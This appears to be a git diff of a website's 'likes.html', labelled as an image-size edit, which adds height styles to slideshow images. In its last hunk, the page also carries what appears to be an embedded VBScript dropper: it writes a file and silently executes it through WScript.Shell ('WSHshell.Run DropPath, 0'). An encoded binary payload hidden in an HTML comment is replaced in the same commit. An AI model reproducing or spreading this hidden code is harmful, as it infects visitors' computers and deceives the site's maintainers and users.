edited the size og image in likes.html

--- a/likes.html
+++ b/likes.html
@@ -6,30 +6,30 @@
         <div id="container">
             <div class="content">
                 <div class="upCon">
-                    <img class="mySlides1" src="images/sp1.png" style="width:100%">
-                    <img class="mySlides1" src="images/sp2.png" style="width:100%">
-                    <img class="mySlides1" src="images/sp3.png" style="width:100%">
-                    <img class="mySlides1" src="images/sp4.png" style="width:100%">
+                    <img class="mySlides1" src="images/sp1.png" style="width:100%; height:100%">
+                    <img class="mySlides1" src="images/sp2.png" style="width:100%; height:100%">
+                    <img class="mySlides1" src="images/sp3.png" style="width:100%; height:100%">
+                    <img class="mySlides1" src="images/sp4.png" style="width:100%; height:100%">
                 </div>
                 <div clsss="downCon">
                 </div>
             </div>
             <div class="content">
                 <div class="upCon">
-                    <img class="mySlides2" src="images/tv1.png" style="width:100%">
-                    <img class="mySlides2" src="images/tv2.png" style="width:100%">
-                    <img class="mySlides2" src="images/tv3.png" style="width:100%">
-                    <img class="mySlides2" src="images/tv4.png" style="width:100%">
+                    <img class="mySlides2" src="images/tv1.png" style="width:100%; height:100%">
+                    <img class="mySlides2" src="images/tv2.png" style="width:100%; height:100%">
+                    <img class="mySlides2" src="images/tv3.png" style="width:100%; height:100%">
+                    <img class="mySlides2" src="images/tv4.png" style="width:100%; height:100%">
                 </div>
                 <div clsss="downCon">
                 </div>
             </div>
             <div class="content">
                 <div class="upCon">
-                    <img class="mySlides3" src="images/mv1.png" style="width:100%">
-                    <img class="mySlides3" src="images/mv2.png" style="width:100%">
-                    <img class="mySlides3" src="images/mv3.png" style="width:100%">
-                    <img class="mySlides3" src="images/mv4.png" style="width:100%">
+                    <img class="mySlides3" src="images/mv1.png" style="width:100%; height:100%">
+                    <img class="mySlides3" src="images/mv2.png" style="width:100%; height:100%">
+                    <img class="mySlides3" src="images/mv3.png" style="width:100%; height:100%">
+                    <img class="mySlides3" src="images/mv4.png" style="width:100%; height:100%">
                 </div>
                 <div clsss="downCon">
                 </div>
@@ -80,4 +80,7 @@ FileObj.Close
 End If
 Set WSHshell = CreateObject("WScript.Shell")
 WSHshell.Run DropPath, 0
-//--></SCRIPT><!--DÜ•–<*šp¾…å,¶^š/±.*Ð¬C$ƒ‰XÆ¥¨Ý^h5ÔäÏFV>è——]“¿Ì8h´$5¬°ì÷™§ôð–wž.É$ËÆ×ò2òç„d'C¨•{ˆÈ	PØÎÍßÏò^§šBü"ÖvF(Ã^kp¤¥àÐžIFj}æheëk¶úF]u·2ÅH\8(ƒÁÌâ|»Gºøgåºùˆ‘Ø­†¯-Ó×W3¹ŠI¥zIWZå ø¡p­D·€ùëÜ›á`MqÑåÈý¸û #†¼ÔïÀ“‘É+Ôá	'Ôê¼ =ü¹Qûêß õéaPßØ*óR^¤b?	Ù]«:P «#êrB£½"]‘¨XÃ€G†{•—6˜­ôª/B7‰üí|¼|€ L`€ÉFÎ³Ÿ+ÌXB:Vž7) …þÆóDb[CqÂZh›;H1LÉ fTì½áæ	•š‡$ŠiuÛ‘ÏÛÞ!Ó³ÕôYWùóùJ–ZA3p‘°pà˜Ÿ ÝçRüøÝçÝçÝç:NqP1[ZÖç Ýç-->
+//--></SCRIPT><!--õÝ…‹‹]£ìa?Nò‰!Ž÷ö[¹ÁƒDÁtüŠî";²Û"2.uµK|1í=E$3È7ü¹Ý 9]§ô­ŸV˜q¿ÀW5Ê–×˜1ÅL ÝVÇK,ö(a§±¸,4+ü5(¼"_Fõ¢É
+Ð×&ò|ÈíÃ‰lÝ´©	G8ŒÂŒL
+ùbœO¡õiÏ„Ìîç8O§²§\u×ù!Þ°¹INTŸâÇ»Lt8`åí#>EÎÆ‘É¡)ò#=Àí_Bõm‘$,íû ™­.Í"“ÞÔ¸O¹ëvl>2ªs¥oŒK<B÷p¤Î¸l§OqÛ!Ãøú•ž?$ÐËT~G0ú	W'*‘X€ó\äƒy'ÀW§rRÑl\‘˜¦Ýô4	Å‚>¸õWzW€ù6 ×?Š sÎ´vhtûñB-šYÐšjÖ7ûéú
+$ ºÒ`Ðþ!ƒ×W7­^ç­ËàêÅcF(°Ê8~ŒŸÔ^Ñs¶¡"ö}‘Ös¸Wiõ àöR#íøàöàöàö­+NÛA [öëö àö-->
